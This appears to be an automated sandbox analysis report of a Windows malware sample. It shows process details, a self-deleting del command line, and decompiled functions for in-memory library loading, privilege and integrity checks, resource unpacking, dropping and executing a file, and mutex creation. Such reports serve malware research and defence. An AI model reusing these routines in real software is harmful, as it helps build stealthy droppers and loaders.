Commandline:	C:\Windows\system32\cmd.exe /c del C:\Users\user~1\AppData\Local\Temp\cnwog.exe >> NUL
Imagebase:	0x4a5a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WudfPf.sys PID: 4 Parent PID: -1

General

Start time:	21:56:17
Start date:	19/11/2018
Path:	C:\Windows\system32\drivers\WudfPf.sys
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x440000
File size:	66560 bytes
MD5 hash:	06E6F32C8D0A3F66D956F57B43A2E070
Has administrator privileges:
Programmed in:	"C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: WBKDqSfWLj.exe PID: 1628 Parent PID: 2260WBKDqSfWLj.exeCOMMON

Execution Graph

Execution Coverage:	18.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	23%
Total number of Nodes:	309
Total number of Limit Nodes:	32

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00DB2604, Relevance: 47.4, APIs: 25, Strings: 2, Instructions: 166
memorylibraryloaderCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00DB2604(intOrPtr* _a4, void* _a8) {
				void* _v8;
				int _v12;
				void* _v16;
				_Unknown_base(*)()* _v20;
				short _v24;
				struct _SID_IDENTIFIER_AUTHORITY _v28;
				short _v32;
				struct _SID_IDENTIFIER_AUTHORITY _v36;
				void* _v40;
				intOrPtr _v44;
				int _v48;
				int _v60;
				long _v64;
				char _v68;
				char* _t49;
				void* _t52;
				_Unknown_base(*)()* _t61;
				intOrPtr* _t62;
				struct _ACL* _t65;
				struct _ACL* _t82;

				_v28.Value = 0;
				_v24 = 0x100;
				_v16 = 0;
				if(AllocateAndInitializeSid( &_v28, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v16) == 0) {
					GetLastError();
					L22:
					return 0;
				}
				_v12 = 0;
				E00DB3510( &_v68, 0, 0x20);
				_v68 = _a8;
				_v40 = _v16;
				_t49 =  &_v68;
				_v64 = 2;
				_v60 = 0;
				_v48 = 0;
				_v44 = 5;
				__imp__SetEntriesInAclA(1, _t49, 0,  &_v12); // executed
				if(_t49 != 0) {
					GetLastError();
					L20:
					FreeSid(_v16);
					goto L22;
				}
				_t52 = LocalAlloc(0x40, 0x14);
				_a8 = _t52;
				if(_t52 == 0) {
					GetLastError();
					L18:
					LocalFree(_v12);
					goto L20;
				}
				E00DB3510(_t52, 0, 0x14);
				if(InitializeSecurityDescriptor(_a8, 1) == 0 || SetSecurityDescriptorDacl(_a8, 1, _v12, 0) == 0) {
					GetLastError();
					LocalFree(_a8);
					goto L18;
				} else {
					_v36.Value = 0;
					_v32 = 0x1000;
					_t61 = GetProcAddress(LoadLibraryA("advapi32.dll"), "AddMandatoryAce");
					_v20 = _t61;
					if(_t61 == 0) {
						L15:
						_t62 = _a4;
						 *_t62 = 0xc;
						 *((intOrPtr*)(_t62 + 4)) = _a8;
						 *((intOrPtr*)(_t62 + 8)) = 0;
						return 1;
					}
					_t65 = LocalAlloc(0x40, 0x200); // executed
					_t82 = _t65;
					if(_t82 == 0) {
						GetLastError();
						goto L15;
					}
					if(InitializeAcl(_t82, 0x200, 2) == 0) {
						L12:
						GetLastError();
						L13:
						LocalFree(_t82);
						goto L15;
					}
					_v8 = 0;
					if(AllocateAndInitializeSid( &_v36, 1, 0x1000, 0, 0, 0, 0, 0, 0, 0,  &_v8) == 0) {
						goto L12;
					}
					_push(_v8);
					_push(1);
					_push(0);
					_push(2);
					_push(_t82);
					if(_v20() == 0 || SetSecurityDescriptorSacl(_a8, 1, _t82, 0) == 0) {
						GetLastError();
						FreeSid(_v8);
						goto L13;
					} else {
						goto L15;
					}
				}
			}

0x00db2621
0x00db2624
0x00db262a
0x00db2635
0x00db27ce
0x00db27d4
0x00000000
0x00db27d4
0x00db2642
0x00db2645
0x00db264d
0x00db2656
0x00db265e
0x00db2664
0x00db266b
0x00db266e
0x00db2671
0x00db2678
0x00db2680
0x00db27bd
0x00db27c3
0x00db27c6
0x00000000
0x00db27c6
0x00db2690
0x00db2698
0x00db269d
0x00db27b0
0x00db27b6
0x00db27b9
0x00000000
0x00db27b9
0x00db26a7
0x00db26bc
0x00db27a3
0x00db27ac
0x00000000
0x00db26d9
0x00db26e3
0x00db26e6
0x00db26f3
0x00db26f9
0x00db26fe
0x00db278c
0x00db278c
0x00db2792
0x00db2798
0x00db279b
0x00000000
0x00db27a0
0x00db270c
0x00db270e
0x00db2712
0x00db2786
0x00000000
0x00db2786
0x00db2720
0x00db2777
0x00db2777
0x00db277d
0x00db277e
0x00000000
0x00db277e
0x00db2738
0x00db2743
0x00000000
0x00000000
0x00db2745
0x00db2748
0x00db274a
0x00db274b
0x00db274d
0x00db2753
0x00db2766
0x00db276f
0x00000000
0x00000000
0x00000000
0x00000000
0x00db2753

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00DB22B7,00000000,00000000,00000000), ref: 00DB262D
_memset.LIBCMT ref: 00DB2645
SetEntriesInAclA.ADVAPI32(00000001,?,00000000,7622DAA3), ref: 00DB2678
LocalAlloc.KERNEL32(00000040,00000014), ref: 00DB2690
_memset.LIBCMT ref: 00DB26A7
InitializeSecurityDescriptor.ADVAPI32(00DB22B7,00000001), ref: 00DB26B4
SetSecurityDescriptorDacl.ADVAPI32(00DB22B7,00000001,7622DAA3,00000000), ref: 00DB26CB
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DB26EC
GetProcAddress.KERNEL32(00000000), ref: 00DB26F3
LocalAlloc.KERNELBASE(00000040,00000200), ref: 00DB270C
InitializeAcl.ADVAPI32(00000000,00000200,00000002), ref: 00DB2718
AllocateAndInitializeSid.ADVAPI32(?,00000001,00001000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,001F0001), ref: 00DB273B
SetSecurityDescriptorSacl.ADVAPI32(00DB22B7,00000001,00000000,00000000), ref: 00DB275C
GetLastError.KERNEL32 ref: 00DB2766
FreeSid.ADVAPI32(001F0001), ref: 00DB276F
GetLastError.KERNEL32 ref: 00DB2777
LocalFree.KERNEL32(00000000), ref: 00DB277E
GetLastError.KERNEL32 ref: 00DB2786
GetLastError.KERNEL32 ref: 00DB27A3
LocalFree.KERNEL32(00DB22B7), ref: 00DB27AC
GetLastError.KERNEL32 ref: 00DB27B0
LocalFree.KERNEL32(7622DAA3), ref: 00DB27B9
GetLastError.KERNEL32 ref: 00DB27BD
FreeSid.ADVAPI32(00DB22B7), ref: 00DB27C6
GetLastError.KERNEL32 ref: 00DB27CE

Strings

AddMandatoryAce, xrefs: 00DB26D9
advapi32.dll, xrefs: 00DB26DE

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorLast$FreeLocal$Initialize$DescriptorSecurity$AllocAllocate_memset$AddressDaclEntriesLibraryLoadProcSacl
String ID: AddMandatoryAce$advapi32.dll
API String ID: 922488538-673174713
Opcode ID: 84f50193a46be12225560f717c9638f85b5f2bbf65bff16593b934253c732d6c
Instruction ID: d1148eeccfd7e811d6b4de4258ef52868568ae8caaae441a06b23762137c464f
Opcode Fuzzy Hash: 84f50193a46be12225560f717c9638f85b5f2bbf65bff16593b934253c732d6c
Instruction Fuzzy Hash: 37514C76900309EFDB10AFA5DC89AEE7BB8FF08741F544129F606E6290DB7489408B75

Uniqueness

Uniqueness Score: -1.00%

Function 00DB29C6, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 106
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00DB29C6() {
				int _t32;
				int _t39;
				void* _t47;
				void* _t51;
				int _t57;
				void* _t63;
				void* _t65;

				_t63 = _t65 - 0x78;
				_t57 = 0;
				E00DB3510(_t63 - 0x3c, 0, 0x9c);
				 *(_t63 - 0x3c) = 0x9c;
				_t32 = GetVersionExA(_t63 - 0x3c);
				if(_t32 != 0) {
					if( *((intOrPtr*)(_t63 - 0x2c)) != 2 ||  *((intOrPtr*)(_t63 - 0x38)) < 6) {
						__imp__#680();
					} else {
						 *(_t63 + 0x74) = 0;
						if(OpenProcessToken(GetCurrentProcess(), 8, _t63 + 0x74) == 0) {
							GetLastError();
							goto L18;
						} else {
							 *(_t63 + 0x68) = 0;
							_t39 = GetTokenInformation( *(_t63 + 0x74), 0x12, _t63 + 0x60, 4, _t63 + 0x68); // executed
							if(_t39 != 0) {
								if( *(_t63 + 0x60) != 3) {
									__imp__#680();
									_t57 = _t39;
									goto L16;
								} else {
									 *(_t63 + 0x70) = 0;
									if(GetTokenInformation( *(_t63 + 0x74), 0x13, _t63 + 0x70, 4, _t63 + 0x68) == 0) {
										goto L7;
									} else {
										_t47 = _t63 - 0x80;
										 *((intOrPtr*)(_t63 + 0x64)) = 0x44;
										__imp__CreateWellKnownSid(0x1a, 0, _t47, _t63 + 0x64);
										if(_t47 == 0) {
											L13:
											GetLastError();
										} else {
											_t51 = _t63 - 0x80;
											 *(_t63 + 0x6c) = 0;
											__imp__CheckTokenMembership( *(_t63 + 0x70), _t51, _t63 + 0x6c);
											if(_t51 == 0) {
												goto L13;
											} else {
												_t57 =  *(_t63 + 0x6c);
											}
										}
										CloseHandle( *(_t63 + 0x70));
										L16:
										CloseHandle( *(_t63 + 0x74));
										L18:
										_t32 = _t57;
									}
								}
							} else {
								L7:
								GetLastError();
								CloseHandle( *(_t63 + 0x74));
								goto L2;
							}
						}
					}
				} else {
					GetLastError();
					L2:
					_t32 = 0;
				}
				return _t32;
			}

0x00db29c7
0x00db29da
0x00db29e1
0x00db29ed
0x00db29f0
0x00db29f8
0x00db2a0b
0x00db2aeb
0x00db2a1b
0x00db2a21
0x00db2a33
0x00db2ae1
0x00000000
0x00db2a39
0x00db2a4e
0x00db2a51
0x00db2a55
0x00db2a72
0x00db2ad2
0x00db2ad8
0x00000000
0x00db2a74
0x00db2a83
0x00db2a8a
0x00000000
0x00db2a8c
0x00db2a90
0x00db2a97
0x00db2a9e
0x00db2aa6
0x00db2ac5
0x00db2ac5
0x00db2aa8
0x00db2aac
0x00db2ab3
0x00db2ab6
0x00db2abe
0x00000000
0x00db2ac0
0x00db2ac0
0x00db2ac0
0x00db2abe
0x00db2ace
0x00db2ada
0x00db2add
0x00db2ae7
0x00db2ae7
0x00db2ae7
0x00db2a8a
0x00db2a57
0x00db2a57
0x00db2a57
0x00db2a60
0x00000000
0x00db2a60
0x00db2a55
0x00db2a33
0x00db29fa
0x00db29fa
0x00db2a00
0x00db2a00
0x00db2a00
0x00db2af8

APIs

_memset.LIBCMT ref: 00DB29E1
GetVersionExA.KERNEL32(?,?,?), ref: 00DB29F0
GetLastError.KERNEL32(?,?), ref: 00DB29FA
GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00DB2A24
OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00DB2A2B
GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00DB2A51
GetLastError.KERNEL32(?,?), ref: 00DB2A57
CloseHandle.KERNEL32(?), ref: 00DB2A60
GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00DB2A86
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?,?,?), ref: 00DB2A9E
CheckTokenMembership.ADVAPI32(?,?,?,?,?), ref: 00DB2AB6
GetLastError.KERNEL32(?,?), ref: 00DB2AC5
CloseHandle.KERNEL32(?), ref: 00DB2ACE
IsUserAnAdmin.SHELL32 ref: 00DB2AD2
CloseHandle.KERNEL32(?), ref: 00DB2ADD
GetLastError.KERNEL32(?,?), ref: 00DB2AE1
IsUserAnAdmin.SHELL32 ref: 00DB2AEB

Strings

rG>v, xrefs: 00DB2A9E

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorLastToken$CloseHandle$AdminInformationProcessUser$CheckCreateCurrentKnownMembershipOpenVersionWell_memset
String ID: rG>v
API String ID: 3265022410-1829036858
Opcode ID: 2def9d3a3be4f8506a9b6e8ba13b53e10ce825c39f4286190d61d36d702771af
Instruction ID: ec8bd9fde627ceeacd4f15185c776401a25d513fd1e68c7bcfba551ce79bf91e
Opcode Fuzzy Hash: 2def9d3a3be4f8506a9b6e8ba13b53e10ce825c39f4286190d61d36d702771af
Instruction Fuzzy Hash: E0310976940309EBDB21AFA1DC58AFE3BB8FB08351F644115FA12D2261DB30D945DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1903, Relevance: 6.1, APIs: 4, Instructions: 98
libraryloaderCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00DB1903(signed int* __ecx, signed int* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t40;
				intOrPtr _t43;
				struct HINSTANCE__* _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				signed int _t50;
				CHAR* _t55;
				_Unknown_base(*)()* _t56;
				intOrPtr _t59;
				signed int* _t60;
				intOrPtr* _t64;
				void* _t67;
				intOrPtr* _t69;
				signed int* _t71;
				signed int _t79;

				_t60 = __ecx;
				_t64 = _a4;
				_t40 =  *_t64;
				_t59 =  *((intOrPtr*)(_t64 + 4));
				_v12 = 1;
				if( *((intOrPtr*)(_t40 + 0x84)) > 0) {
					_t67 =  *((intOrPtr*)(_t40 + 0x80)) + _t59;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						_t69 = _t67 + 0x10;
						_v8 = _t69;
						while(1) {
							_t43 =  *((intOrPtr*)(_t69 - 4));
							if(_t43 == 0) {
								goto L23;
							}
							_t45 = LoadLibraryA(_t43 + _t59); // executed
							_v16 = _t45;
							if(_t45 == 0xffffffff) {
								L22:
								_v12 = _v12 & 0x00000000;
							} else {
								_t48 = E00DB1509(_t60,  *((intOrPtr*)(_t64 + 8)), 4 +  *(_t64 + 0xc) * 4); // executed
								 *((intOrPtr*)(_t64 + 8)) = _t48;
								if(_t48 == 0) {
									goto L22;
								} else {
									 *((intOrPtr*)(_t48 +  *(_t64 + 0xc) * 4)) = _v16;
									 *(_t64 + 0xc) =  *(_t64 + 0xc) + 1;
									_t49 =  *((intOrPtr*)(_t69 - 0x10));
									if(_t49 == 0) {
										_t71 =  *_t69 + _t59;
										_t60 = _t71;
									} else {
										_t71 = _t49 + _t59;
										_t60 =  *_v8 + _t59;
									}
									_t50 =  *_t71;
									if(_t50 != 0) {
										_a4 = _t60;
										_a4 = _a4 - _t71;
										_t79 = _t50;
										L12:
										L12:
										if(_t79 >= 0) {
											_t55 = _t50 + _t59 + 2;
										} else {
											_t55 = _t50 & 0x0000ffff;
										}
										_t56 = GetProcAddress(_v16, _t55);
										_t60 = _a4;
										 *(_t60 + _t71) = _t56;
										if( *(_t60 + _t71) == 0) {
											goto L18;
										}
										_t71 =  &(_t71[1]);
										_t50 =  *_t71;
										if(_t50 != 0) {
											goto L12;
										} else {
										}
										goto L19;
										L18:
										_v12 = _v12 & 0x00000000;
									}
									L19:
									if(_v12 != 0) {
										_v8 = _v8 + 0x14;
										if(IsBadReadPtr(_v8 + 0xfffffff0, 0x14) == 0) {
											_t69 = _v8;
											continue;
										} else {
										}
									}
								}
							}
							goto L23;
						}
					}
					L23:
				}
				return _v12;
			}

0x00db1903
0x00db190b
0x00db190e
0x00db1917
0x00db191a
0x00db1921
0x00db1930
0x00db193b
0x00db1941
0x00db1944
0x00db194c
0x00db194c
0x00db1951
0x00000000
0x00000000
0x00db195a
0x00db1960
0x00db1966
0x00db1a15
0x00db1a15
0x00db196c
0x00db197a
0x00db197f
0x00db1984
0x00000000
0x00db198a
0x00db1990
0x00db1993
0x00db1996
0x00db199b
0x00db19ab
0x00db19ad
0x00db199d
0x00db199d
0x00db19a5
0x00db19a5
0x00db19af
0x00db19b3
0x00db19b5
0x00db19b8
0x00db19bb
0x00000000
0x00db19bd
0x00db19bd
0x00db19c8
0x00db19bf
0x00db19bf
0x00db19bf
0x00db19cf
0x00db19d5
0x00db19d8
0x00db19e1
0x00000000
0x00000000
0x00db19e3
0x00db19e6
0x00db19ea
0x00000000
0x00000000
0x00db19ec
0x00000000
0x00db19ee
0x00db19ee
0x00db19ee
0x00db19f2
0x00db19f6
0x00db19f8
0x00db1a0d
0x00db1949
0x00000000
0x00000000
0x00db1a13
0x00db1a0d
0x00db19f6
0x00db1984
0x00000000
0x00db1966
0x00db194c
0x00db1a19
0x00db1a19
0x00db1a20

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?), ref: 00DB1933
LoadLibraryA.KERNEL32(?), ref: 00DB195A
GetProcAddress.KERNEL32(?,00000012,?,?), ref: 00DB19CF
IsBadReadPtr.KERNEL32(-000000DC,00000014,?,?), ref: 00DB1A05

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: Read$AddressLibraryLoadProc
String ID:
API String ID: 2438460464-0
Opcode ID: b3ea2555b2242ec6d41b1f2bded9f25ac25eebfb539c71eccca8269abf44ab59
Instruction ID: 4c7abcd8f9d92e23b374657a7fb4a18dd34bf19b5e75dc8f78d05d9ef8433bc8
Opcode Fuzzy Hash: b3ea2555b2242ec6d41b1f2bded9f25ac25eebfb539c71eccca8269abf44ab59
Instruction Fuzzy Hash: 51317C7AA00215EFDB10CF58C8A4BA9B7B8FF05314F688169E856E7390D730ED55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DB13D0, Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00DB13D0(CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t5;
				void* _t7;
				void* _t19;
				void* _t22;

				_t5 = FindResourceA(0, _a4, 0xa); // executed
				if(_t5 != 0) {
					_t7 = LoadResource(0, _t5);
					if(_t7 != 0) {
						_t22 = LockResource(_t7);
						_t19 =  *((intOrPtr*)(_t22 + 4)) + _t22;
						_t15 = E00DB14F3( *((intOrPtr*)(_t22 + 0x10)));
						if(_t9 != 0) {
							if(E00DB159C(_t19, _t15) ==  *((intOrPtr*)(_t22 + 0x10))) {
								E00DB1705(_t15);
							}
							E00DB1A94(_t19, _t15); // executed
							E00DB14D8(_t15);
						}
					}
				}
				return 0;
			}

0x00db13d8
0x00db13e0
0x00db13e5
0x00db13ed
0x00db13f9
0x00db1401
0x00db1408
0x00db140c
0x00db1418
0x00db141b
0x00db141b
0x00db1421
0x00db1427
0x00db1427
0x00db142e
0x00db13ed
0x00db1431

APIs

FindResourceA.KERNEL32(00000000,00DB145D,0000000A), ref: 00DB13D8
LoadResource.KERNEL32(00000000,00000000,?,?), ref: 00DB13E5
LockResource.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00DB13F3

Part of subcall function 00DB14F3: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004,00DB1408,?,?,?), ref: 00DB1500

Part of subcall function 00DB1A94: VirtualAlloc.KERNELBASE(?,?,00002000,00000004,?,?,?,00DB1426,00000000,?,00000000,?,?,?), ref: 00DB1AE5
Part of subcall function 00DB1A94: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,00DB1426,00000000), ref: 00DB1B03
Part of subcall function 00DB1A94: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000014,?,?,?,00DB1426,00000000), ref: 00DB1B51
Part of subcall function 00DB1A94: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?,00DB1426,00000000), ref: 00DB1B67

Part of subcall function 00DB14D8: VirtualFree.KERNEL32(?,00000000,00008000,00DB154A,00DB197F,00000000,00DB197F,?,?,00000000,?,?,?,00DB197F), ref: 00DB14EA

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: Virtual$Alloc$Resource$FindFreeLoadLock
String ID:
API String ID: 3090263981-0
Opcode ID: 2a93a522ad4203c4bc1a42c201755a8f06a0432b98d84adc6fb17207df865b97
Instruction ID: 146de31461ba5a6593f71401e3bae7c1d66dfc24aa1099e1e4034b6147daeb80
Opcode Fuzzy Hash: 2a93a522ad4203c4bc1a42c201755a8f06a0432b98d84adc6fb17207df865b97
Instruction Fuzzy Hash: E9F089BD700301E7D6307BB59CA9FAB76ADEF45791F848814F607D2141DB34D8408671

Uniqueness

Uniqueness Score: -1.00%

Function 00DB289C, Relevance: 24.1, APIs: 16, Instructions: 104
memoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00DB289C() {
				intOrPtr _t23;
				int _t32;
				int _t39;
				long _t51;
				void* _t62;
				void* _t63;
				void* _t65;

				_t63 = _t65 - 0x70;
				_t51 =  *(_t63 + 0x7c);
				 *((intOrPtr*)(_t63 + 0x68)) = 0;
				 *(_t63 + 0x6c) = 0;
				if(_t51 == 0) {
					L17:
					_t23 = 0;
				} else {
					 *_t51 = 0;
					E00DB3510(_t63 - 0x34, 0, 0x9c);
					 *(_t63 - 0x34) = 0x9c;
					if(GetVersionExA(_t63 - 0x34) != 0) {
						L3:
						if( *((intOrPtr*)(_t63 - 0x30)) < 6) {
							goto L17;
						} else {
							if(OpenProcessToken( *(_t63 + 0x78), 0x18, _t63 + 0x6c) == 0) {
								GetLastError();
							} else {
								 *(_t63 + 0x7c) = 0;
								_t32 = GetTokenInformation( *(_t63 + 0x6c), 0x19, 0, 0, _t63 + 0x7c); // executed
								if(_t32 != 0) {
									L13:
									GetLastError();
								} else {
									if(GetLastError() != 0x7a) {
										GetLastError();
									} else {
										_t62 = LocalAlloc(0x40,  *(_t63 + 0x7c));
										if(_t62 == 0) {
											goto L13;
										} else {
											_t39 = GetTokenInformation( *(_t63 + 0x6c), 0x19, _t62,  *(_t63 + 0x7c), _t63 + 0x7c); // executed
											if(_t39 == 0) {
												GetLastError();
											} else {
												 *_t51 =  *(GetSidSubAuthority( *_t62,  *(GetSidSubAuthorityCount( *_t62)) - 0x00000001 & 0x000000ff));
												 *((intOrPtr*)(_t63 + 0x68)) = 1;
											}
											LocalFree(_t62);
										}
									}
								}
								CloseHandle( *(_t63 + 0x6c));
							}
							_t23 =  *((intOrPtr*)(_t63 + 0x68));
						}
					} else {
						 *(_t63 - 0x34) = 0x94;
						if(GetVersionExA(_t63 - 0x34) == 0) {
							goto L17;
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}

0x00db289d
0x00db28a8
0x00db28af
0x00db28b2
0x00db28b7
0x00db29ba
0x00db29ba
0x00db28bd
0x00db28c8
0x00db28ca
0x00db28d5
0x00db28e3
0x00db28fa
0x00db28fe
0x00000000
0x00db2904
0x00db2915
0x00db29af
0x00db291b
0x00db2926
0x00db292f
0x00db2933
0x00db299e
0x00db299e
0x00db2935
0x00db2940
0x00db299a
0x00db2942
0x00db294d
0x00db2951
0x00000000
0x00db2953
0x00db2960
0x00db2964
0x00db298b
0x00db2966
0x00db2980
0x00db2982
0x00db2982
0x00db2992
0x00db2992
0x00db2951
0x00db2940
0x00db29a7
0x00db29a7
0x00db29b5
0x00db29b5
0x00db28e5
0x00db28e9
0x00db28f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00db28f4
0x00db28e3
0x00db29c3

APIs

_memset.LIBCMT ref: 00DB28CA
GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00DB28DF
GetVersionExA.KERNEL32(?), ref: 00DB28F0
OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00DB290D
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00DB292F
GetLastError.KERNEL32 ref: 00DB293B
LocalAlloc.KERNEL32(00000040,?), ref: 00DB2947
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00DB2960
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DB2968
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DB2978
GetLastError.KERNEL32 ref: 00DB298B
LocalFree.KERNEL32(00000000), ref: 00DB2992
GetLastError.KERNEL32 ref: 00DB299A
GetLastError.KERNEL32 ref: 00DB299E
CloseHandle.KERNEL32(?), ref: 00DB29A7
GetLastError.KERNEL32 ref: 00DB29AF

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: ErrorLast$Token$AuthorityInformationLocalVersion$AllocCloseCountFreeHandleOpenProcess_memset
String ID:
API String ID: 1389885952-0
Opcode ID: c533ee97e57cb0e32d170df38876d5e25ad03f6a8c327d641d7dcab5fba30a3b
Instruction ID: 7b98956b8267b93bc455d03851ee87180ac9d8ba1f044d7941b38e675ee39a98
Opcode Fuzzy Hash: c533ee97e57cb0e32d170df38876d5e25ad03f6a8c327d641d7dcab5fba30a3b
Instruction Fuzzy Hash: 3531487A840318EFEB20AF65EC48AEE7BA8EF49341F240115F91AD2220D731C941DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00401278, Relevance: 13.5, APIs: 8, Instructions: 1526
filememorystringCOMMON

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00A6EE60,00001000,00000004), ref: 004012A0
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401322
ReadFile.KERNELBASE(?,?,?,?,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401366
lstrcmpW.KERNELBASE(?,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401372
CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013A8
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013C4
ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013FF
ExitProcess.KERNELBASE(00000000,?,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401407

Memory Dump Source

Source File: 00000001.00000002.1212668515.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1212660695.00400000.00000004.sdmp
Associated: 00000001.00000002.1212676117.00402000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WBKDqSfWLj.jbxd

Similarity

API ID: File$Create$AllocExecuteExitProcessReadShellVirtualWritelstrcmp
String ID:
API String ID: 3734528952-0
Opcode ID: 997a922c275003f903be381bb82019e38aafddd869d9bf8e0cd261d09117cbb6
Instruction ID: 64cf2b4e31a5b2b98cadcca01765f079aa3efa7d172f38e8ef5b84d31c2c6752
Opcode Fuzzy Hash: 997a922c275003f903be381bb82019e38aafddd869d9bf8e0cd261d09117cbb6
Instruction Fuzzy Hash: 0C023E71A00214AFEF149FA8CC49BEEBBB9EF48311F144169F909EB291DA749D41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2291, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30
synchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00DB2291(void* __eflags) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t7;
				void* _t10;
				void* _t12;

				_t12 = 0;
				E00DB3510( &_v16, 0, 0xc);
				_t7 = E00DB2604( &_v16, 0x1f0001); // executed
				if(_t7 != 0) {
					_t10 = CreateMutexA( &_v16, 0, "Global\\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}"); // executed
					_t12 = _t10;
					if(_t12 == 0) {
						GetLastError();
					}
				}
				return _t12;
			}

0x00db229a
0x00db22a1
0x00db22b2
0x00db22b9
0x00db22c5
0x00db22cb
0x00db22cf
0x00db22d1
0x00db22d1
0x00db22cf
0x00db22db

APIs

